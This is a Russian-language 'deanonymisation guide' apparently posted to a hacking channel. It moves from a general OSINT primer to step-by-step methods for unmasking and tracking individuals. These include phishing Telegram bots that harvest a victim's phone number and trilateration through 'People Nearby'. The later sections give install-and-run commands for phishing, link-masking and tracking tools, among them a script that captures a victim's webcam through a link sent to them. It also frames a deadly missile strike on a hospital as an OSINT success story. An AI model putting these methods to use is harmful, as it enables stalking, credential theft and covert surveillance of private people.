Гайд по деанону

[bratva]

1. Вступление
Что такое OSINT.
OSINT (Open Source Intelligence) - это интернет разведка, которая основана на том, что мы ищем информацию об объекте из открытых источников, таких как интернет, соцсети СМИ, реестры и т.д.

Разведка - это результат объединения анализированной, интерпретированной и подтвержденной информации с информированными восприятиями и личным опытом для принятия решений.

Разведка создается и формируется людьми. Машины могут собирать информацию, но не могут производить разведку.

Виды OSINT разведки.
OSINT делится на два типа: активная и пассивная разведка.

Пассивная разведка представляет собой процесс поиска информации об объекте без прямого взаимодействия с ним. Примерами такой деятельности могут быть анализ результатов поисковых систем, изучение социальных сетей и другие подобные методы.
Активная разведка представляет собой процесс активного взаимодействия с объектом, включая отправку пакетов данных, общение и прямое воздействие на цель. Это означает прямое взаимодействие с человеком или инфраструктурой компании для получения информации или выполнения определенных действий.

Этапы OSINT разведки.
1. Планирование: "Иди туда, не знаю куда, принеси то, не знаю что". В первую очередь, мы определяем цель поиска и направление движения. Набравшись опыта, вы сможете лучше понимать, где искать. Многое зависит от поставленной задачи, будь то составление справок о физических лицах, проверка компаний и их учредителей, или точечный поиск с помощью спутника.
2. Поиск и собирание информации: На данном этапе не существует универсального алгоритма, так как цель часто уникальна, и необходимо адаптировать подход с учетом особенностей. Иногда информация, с которой можно работать, доступна на поверхности, в то время как в других случаях требуется полноценный мониторинг и постепенный сбор данных, иногда даже с использованием социальной инженерии. Следует отметить, что существуют два вида сбора информации: активный и пассивный.
3. Анализ: Первым делом — фактчекинг, проверяем насколько достоверен источник перед нами, а также насколько информация логична и непротиворечива.
4. Отчёт: Зафиксировав собранную информацию, важно помнить, что мы не роботы и многие вещи могут быть забыты. Кроме того, восприятие больших объемов данных будет намного проще, если информация представлена в структурированном виде. В данном контексте речь идет о простых записях в таблицах или майндкартах. Последние будут наиболее удобными при работе с обширными данными, когда ум может быть перегружен. Для тех, кто не знаком с термином, майндкарты представляют собой схемы связей и детализации информации "от общего к частному".

Пример OSINT разведки.
Многие могут ошибочно думать, что OSINT - лишь забава, смеха ради. Однако OSINT не ограничивается простым деаноном человека, за частую наоборот – это его меньшая часть.

Приведу недавний пример:
Сие действие происходило 26 марта в Днепре (Украина) во время войны. Дама украинского происхождения по имени anna_alkhim выкладывает в свой инстаграм сторис вечером 25 марта, в котором обратилась к своим подписчикам с просьбой о помощи с переполненными госпиталями раненных военных ВСУ.

Вот только у нее не хватило осведомленности, что российская разведка в кратчайшие сроки отслеживала всю социальную активность людей из районов боевых действий, вы можете задаться вопросом, и что же могло произойти?



Менее чем за сутки от медицинского госпиталя остались лишь обугленные стены.

Днём 26 марта в Днепре раздался взрыв, немого позже стало известно, что это ракетный удар по медицинскому учреждению, в результате которого погибло 2 человека, 30 были ранено, среди них было двое детей.



Основные OSINT инструменты.
Инструменты поиска: Google, Bing, DuckDuckGo, Shodan, SpyFu
Инструменты парсинга: Scrapy, Beautiful Soup, Octoparse
Инструменты анализа: Maltego, NodeXL, Gephi
Социальные сети: Facebook, Twitter, LinkedIn, Instagram
Форумы и блоги: Reddit, Quora
Реестры: WHOIS, DomainTools, IPInfoDB

Как вы видите, ничего "хакерского", практически все инструменты есть бесплатно. Это основные инструменты для поиска, конкретные парсеры / анализаторы будут дальше в статье.

2. Дисциплины сбора разведданных
Подвиды OSINT.
Ниже приведен краткий список дисциплин:

- BLOCKINT (разведка блокчейн) — данные, о криптовалютных транзакциях записанных в блокчейне.
- COMINT (коммуникационная разведка) — данные, собранные путем перехвата сигналов между людьми.
- CRIMINT (криминальная разведка) — данные о преступной деятельности и преступниках, часто собираемые правоохранительными органами.
- CYBINT (киберразведка) — данные, полученные из компьютерных систем и сетей.
- DARKINT (разведка в даркнет) — данные, собранные в сетях Tor, I2P, Freenet и прочее.
- ELINT (электронная разведка) — данные, собранные путем перехвата сигналов между электронными системами.
- FININT (финансовая разведка) — данные о финансовой деятельности, часто получаемые из финансовых учреждений.
- GEOINT (геопространственная разведка) — географические данные, обычно получаемые от спутников.
- IMINT (разведка на основе фотографий) — данные из фотографий или других изображений.
- SIGINT (разведка сигналов) — данные, собранные путем перехвата сигналов между людьми или электронными системами.
- SOCMINT (разведка в социальных сетях).
- TECHINT (техническая разведка) — данные об оборудовании, технологиях.
- TELINT (телеметрическая разведка). Предыдущее название FSINT.
- HUMINT (сбор и анализ информации, полученной от людей), например, через контакты с агентами, информаторами или иными источниками внутри или вблизи целевой организации.
- RUMINT - это термин, который относится к разведке на основе слухов, где информация основана на неофициальных источниках. Это шутливое отношение к HUMINT, а не настоящая разведывательная дисциплина.

Также возможно увидеть упоминания TRASHINT, что представляет собой разведку мусора, где данные собираются из мусора или вторичных источников. Это шутливое отношение к другим разведывательным дисциплинам, а не настоящая разведывательная область.

Дальше в статье я разберу самые важные для нас.

GEOINT.
GEOINT, или геопространственная разведка - это процесс использования и анализа изображений, геопространственной информации для описания, оценки и визуального отображения физических особенностей и установления географической привязки деятельности на Земле.

Если быть проще, GEOINT может помочь определить местонахождение цели по одной ее фото из открытого доступа.

Хорошим примером будет недавняя история: девушка поделилась в соцсетях, как она купается в Ницце в 5:30 утра, но Тревор Рэйнболт разоблачил врунишку, рассчитав азимут и высоту теней, выяснив, что видео записано в ≈ 6:05 утра.
С Тревором Рэйнболтом многие не знакомы, эта личность прославилась благодаря тому, что он стал одним из топовых игроков в GeoGuessr - игра, в которой необходимо угадать местоположение улицы/переулка/шоссе в мире, пометив его на карте Google Maps.

В прошлом доступ к таким инструментам мог быть дорогостоящим и ограниченным, однако с развитием технологий появилось множество бесплатных ресурсов, которые можно использовать для создания теневых моделей и анализа метаданных в рамках GEOINT. Одним из таких инструментов являются бесплатные моделяторы теней, которые позволяют создавать трехмерные модели объектов и ландшафтов на основе анализа изображений и геоданных.

Кроме того, метаданные с фотографий и файлов также могут быть использованы в рамках GEOINT для получения дополнительной информации о местоположениях, времени съемки и других параметрах, которые могут быть полезны при анализе геопространственных данных.

Рассмотрим пример применения GEOINT вместе с SOCMINT:

Для дальнейшего анализа возьмем данную персону, у него имеется имя пользователя в ТГ, что сыграет важную роль в идентификации.
Назовём его вымышленным именем Алешка, начнём с анализа его страницы в Telegram, Алешка недавно был в сети, у него в профиле четыре фотографии, подмечаем каждую деталь(может пригодиться)



Проверяем его никнейм на наличие страниц в других социальных сетях, есть совпадение. У Алешки была страница в Instagram под тем же псевдонимом, что и его аккаунт в Telegram.

Алек исходя из выложенных в Instagram фотографий сильно увлечён футболом, им была выложена видеозапись, где он на фоне стадиона тренируется с мячом:
Благодаря классическим методам GEOINT'а мы можем распознать что за стадион перед нами, и где он находится. Обратившись к Google Lens, мы получаем необходимую ссылку среди сотен результатов. Итак, это «Стадион им. Гагарина» геометки с видео совпадают.



SOCMINT.
SOCMINT - это совокупность инструментов и решений, позволяющих организациям анализировать действия, на основе интересов пользователя. Он позволяет использовать разведывательные данные из социальных медиа-сайтов, в том числе с использованием открытых и закрытых соцсетей.

Простыми словами - это анализ социальных сетей цели. Как показано из примера выше, по социальным сетям мы можем узнать все, от точного местонахождении цели, до обычных фактов таких как имя, возраст, имя любимой собачки и что цель ела вчера на ужин. Пример исследования SOCMINT был главой выше.

HUMINT.
Из самого названия Human Sources Intelligence (HUMINT) следует, что сведения для анализа «добывают» в процессе коммуникации с человеком, который является носителем значимой информации об объекте исследования.

Фактически - использование социальной инженерии и психологии для получения данных. Основным преимуществом HUMINT является его гибкость и способность получать информацию, которую невозможно получить другими методами. Кроме того, HUMINT может предоставить более глубокое понимание человеческого поведения и мотивации, что позволяет разработать стратегию под дeан0н конкретного человека. От HUMINT`а не защитит впн и прокси, не поможет даже антидетект браузер, ведь за частую вы сами рассказываете нужную информацию о себе.

HUMINT может применятся как для обычного деанона так и для получения более важных сведениях, приведем пример:

Проводится с целью сбора разведданных путём общения с военнослужащим, а также при отправке военнослужащими фото/видео с позиций и т.п.

HUMINT`ом также занимаются скамеры при общении с мамонтом, они проводят разведку что бы узнать через какие пути и манипуляции можно получить профит.

При работе с HUMINT важно понимать что такое соцаильная инженерия и как ее использовать, статья о ней уже была на канале.

3. Анализ и dеанoнимизация в Telegram

Верификация.
Telegram использует протоколы для социальных сетей, где личные аккаунты и сообщества (чаты, каналы) распознаются при помощи специального численного идентификатора ID, который необходим системе для точной идентификации пользователя.

В некоторых модах телеграм клиента встроенно распознование ID телеграм, но если у вас этого нет, используйте телеграм ботов.

Например, @userinfobot показывает ID по username`у и наоборот.

Поисковики информации.
Поисковая система (англ. search engine) — алгоритмы и реализующая их совокупность компьютерных программ, предоставляющая пользователю возможность быстрого доступа к необходимой ему информации при помощи поиска в обширной коллекции доступных данных.

Поисковые системы могут помочь уставить связь между несколькими аккаунтами, например, для обнаруживания твинков, так же, поисковые системы могут найти аккаунты в других социальных сетях по нику.

Конкретные инструменты будут предоставлены ниже.

Чаты телеграм.
Чаты в Telegram особенно важны для проведения расследований, связанных с деанонимизацией Telegram-аккаунтов.
Тут есть 2 стула. Первый - искать чаты через соответствующие боты поисковики, второй - искать чаты через общение с пользователем. Можно использовать социальную инженерию и просто попросить их, или пойти по более элегантному пути, и спарсить чат по названию из скриншота. Если чат открытый - его и вовсе можно найти через глобальный поиск.

Анализировать чаты - неимоверно важно, ибо человек в чатах общается со своими знакомыми и сам выдает информацию, он не находится в состоянии паранойи, и не догадывается что его сообщения могут использовать третьи лица. Боты в телеграм уже научились выгружать сообщения пользователей из чатов, поэтому даже удаление сообщений далеко не всегда помогает.

Боты обманки.
Для исполь�зования это�го спо�соба деано�ними�зации пот�ребу�ется нем�ного соци�аль�ной инже�нерии. Методи�ка работа�ет по прин�ципу фишин�га: жер�тва заходит в бота, и для даль�нейше�го его исполь�зования зап�рашива�ется отправ�ка номера телефо�на (это встро�енная фун�кция мес�сен�дже�ра). Далее, в зависи�мос�ти от фан�тазии соз�дателя, бот либо игно�рирует сооб�щения, либо выпол�няет какие‑то полез�ные фун�кции, но глав�ное — вла�делец робота получа�ет номер поль�зователя.

Са�мое инте�рес�ное, что у тебя нет ни малей�шей необ�ходимос�ти писать с нуля собс�твен�ного бота, потому что есть уже готовые решения.

Од�нако луч�ше, конеч�но, написать бота самос�тоятель�но, но и для это�го есть наработ�ки — ре�пози�тории на GitHub. Ими мож�но вос�поль�зоваться без редак�туры, они поз�волят сра�зу соз�дать нес�коль�ко пол�ноцен�ных ботов «из короб�ки». При этом ты можешь выб�рать из нес�коль�ких темати�ческих вари�антов бота: нак�рутка под�писчи�ков в инстаг�раме, онлайн‑зна�комс�тва, донат в компь�ютер�ную игру и поиск информа�ции по номеру телефо�на.

Но пом�ни, что основная задача — все‑таки зас�тавить поль�зовате�ля поделить�ся номером, поэто�му дей�ствие это дол�жно быть мотиви�ро�вано. А мотива�цию мы выбира�ем инди�виду�ально под каж�дую цель, зна�чит, и темати�ка бота, ско�рее все�го, будет раз�ной. Кто‑то поделит�ся номером ради оцен�ки под�ер�жан�ного авто�моби�ля, кто‑то — что�бы най�ти инте�рес�ный фильм, кого‑то заин�тересу�ет ска�чива�ние видео с YouTube. Поэто�му ботов при�дет�ся соз�давать раз�ных под каж�дый кейс, а основной код мож�но ско�пиро�вать из упо�мяну�тых репози�тори�ев.


HLR запрос.
Номер телефона мы получили, но как понять настоящий он или виртуальный?

HLR запрос (Home Location Register) – проверка актуальности мобильного номера и очистка базы абонентов от неактивных номеров. Проверка проводится путем отправки на номер запроса с уточнением информации о состоянии абонента.

Воспользуйтесь HLR-запросом от оператора. Этот запрос поможет узнать, активен ли номер и находится ли он в сети. Такой подход позволит вам проверить статус номера без необходимости совершать звонок. Сервисы предоставляющие эту возможность бесплатны и легко находятся в интернете.

Получаем местоположение.
В 2019 году в мессенджере Telegram была добавлена новая функция под названием "Люди рядом". Эта возможность позволяет пользователям делиться своим текущим местоположением для обнаружения контактов и чатов поблизости. Впоследствии точное местоположение было убрано, однако до сих пор можно передавать информацию о локации в радиусе 500 метров.

Ко�неч�но, OSINT-спе�циалис�ты такую инте�рес�ную воз�можность не упус�тили и соз�дали нес�коль�ко инс�тру�мен�тов для экс�плу�ата�ции фичи. Работа�ют они сле�дующим обра�зом.

На рабочем акка�унте вклю�чает�ся фун�кция «Люди рядом» и зада�ются те коор�динаты, в которых пред�положи�тельно находит�ся цель. Каж�дые 25 секунд всем бли�жай�шим к ука�зан�ной точ�ке поль�зовате�лям будет отправ�лять�ся TDLib из Telegram. В него вхо�дит рас�сто�яние каж�дого бли�жай�шего поль�зовате�ля до тво�его мес�тополо�жения. Исполь�зуя три рас�сто�яния от трех раз�ных точек, мож�но вычис�лить мес�тополо�жение бли�жай�шего поль�зовате�ля.

При этом будут най�дены толь�ко те поль�зовате�ли Telegram, у которых акти�виро�вана фун�кция «поб�лизос�ти». По умол�чанию она отклю�чена. И конеч�но, для начала тебе необ�ходимо иметь хотя бы при�мер�ное пред�став�ление о мес�тонахож�дении объ�екта тво�его инте�реса. Мож�но пов�торять поиск в нес�коль�ких мес�тах, если исходная область слиш�ком боль�шая

Пример инструмента
Метаданные.
Метаданные — данные, относящиеся к дополнительной информации о содержимом или объекте. Проще говоря, это какая-либо дополнительная информация, зашифрованная в структуре самого файла.

Через социальную инженерию можно вынудить человека сделать и отправить вам фото без сжатия (файлом), например, под предлогом, что у вас проблемы с просмотром обычных фотографий. После получения файла используя специальные сервисы для извлечения метаданных получить информацию о user-Agent пользователя, его геолокации и другие данные о устройстве.

User agent – это программный элемент браузера, обозначающий человека, пользующимся им. Обычно он хранится в файле и содержит несколько текстовых строк, которые как раз и необходимы для идентификации.

Нетипичный фишинг.
Фишинговая ссылка для отправки сообщения в WhatsApp:

<a href="https://wa.me/НОМЕР_ТЕЛЕФОНА?text=ТЕКСТ!">СООБЩЕНИЕ В WHATSAPP</a>
Фишинговая ссылка для звонка через приложение Skype:

<a href="skype:ЛОГИН?call">ЗВОНОК В SKYPE</a>
Фишинговая ссылка для звонка через приложение ВКонтакте:

<a href="https://vk.com/call?id=НОМЕР_ID">ЗВОНОК В ВКОНТАКТЕ</a>

Каналы.
Новостные каналы в Telegram в короткие сроки приобрели огромную популярность.
Особенно это коснулось распространения околополитических прогнозов и статей.
Впрочем, свои каналы стали вести все:
от частных компаний до преступных сообществ.

Зная в каких каналах сидит цель, можно предположить ее место жительства, интересы, знакомых и прочее.

До 2017 года ссылки на приватные каналы в телеграм содержали закодированную информацию о том, кто ее сгенерировал. У таких ссылок, созданных до 2017 года, не содержится в начале «AAAAA» в ссылке.
Через ботов можно установить кто владелец канала если он был создан до 2017 года.
Просто отправьте боту ссылку на канал и он пришлет вам ID владельца.

Администраторы Telegram-канала могут использовать для управления публикациями внешние боты или сервисы (TGStat, Livegram, posted и прочие). А те могут раскрыть информацию о них.

4. Инструменты
Слежка через ссылку.
Инструмент создает фишинг ссылку, и через нее следит за пользователем.
Благодаря данному инструменту можно получить такую информацию как: IP, локация, ОС.

Так же можно будет узнать на каких сервисах зарегестрирован пользователь.

Установка:

$ apt update -y
$ apt upgrade -y
$ apt install python
$ apt install git
$ git clone https://github.com/jofpin/trape.git
Запуск:

$ cd trape
$ pip3 install -r requirements.txt
$ python3 trape.py --url <ссылка на любую страницу> --port 8080
Мы получим следующее:
Фишинг ссылку.
Ссылку на админ панель.
Пароль для входа в админ панель.

Маскировка фишинг ссылки.
Утилита, может помочь замаскировать/сократить ссылки. Фишинг маскируется под Google, YouTube, VK, Facebook, OK и RAIDforums.

Установка и запуск:

$ pkg update
$ pkg install python
$ pkg install git
$ git clone https://github.com/claprusshow/HIDDEN-PHISHING
$ cd HIDDEN-PHISHING
$ pip install -r requirements.txt
$ python HIDDEN-PHISHING.py
Теперь выбираем что нам нужно, маскировать ссылку или сократить ссылку. Затем указываем ссылку для маскировки/сокращения.

После этого за считанные секунды мы получим замаскированные/сокращённые ссылки.

Отслеживаем местоположение.
Инструмент для отслеживания местоположение номера телефона.

Установка и запуск:

pkg install git
pkg install python3
git clone https://github.com/HunxByts/GhostTrack.git
cd GhostTrack
pip3 install -r requirements.txt
python3 GhostTR.py

Поиск аккаунтов в социальных сетях.
Инструмент умеет не только находить существующие на разных сайтах аккаунты, но и находить сам аккаунт (с помощью определенных модулей), даже если профиль не имеет ничего общего с электронной почтой.

Установка и запуск:

pkg install git
pkg install python3
$ git clone https://github.com/N0rz3/Eyes.git
$ cd ./Eyes
$ pip3 install -r requirements.txt
python eyes.py [email]

Анализ телеграм профиля.
Инструмент предоставляет не только функции скрепинга информации о Телеграм каналах или чатах, но и:

- Анализ/визуализацию связей между пользователями.
- Экстракцию ключевых фраз/слов из сообщений пользователя.
- Выгрузка сущностей (энтити).
- Поиск геометок.

Установка и запуск:

git clone https://github.com/sockysec/Telerecon.git
sudo apt update
sudo apt upgrade
pip install -r requirements.txt
python3 -m spacy download en_core_web_sm
python3 launcher.py

Фишинг популярных сервисов.
Специальный инструмент для фишинговых ссылок
Популярных сервисов. Например Yandex. Instagram и прочих.

Установка:

apt upgrade && apt update
pkg install git
git clone https://github.com/An0nUD4Y/blackeye
ls
cd blackeye
Запуск:

bash blackeye.sh

Получаем фото с вебкамеры.
Скрипт с помощью которого можно без каких-либо проблем получать фото с  веб-камеры пользователей.

Установка и запуск:

$ git clone https://github.com/noob-hackers/grabcam
$ cd grabcam
$ chmod +x grabcam.sh
$ bash grabcam.sh
После выполнения последней команды, включите на своем устройстве 2 пункта - "Мобильный интернет" и "Точка доступа Wi-Fi".

Возвращаемся к терминалу и выбираем пункт "Ngrok". Далее будет сгенерирована специальная ссылка, кидаем её жертве и ждём. В случае успеха, для просмотра фотографий введите команду:

$ termux-open cam название.png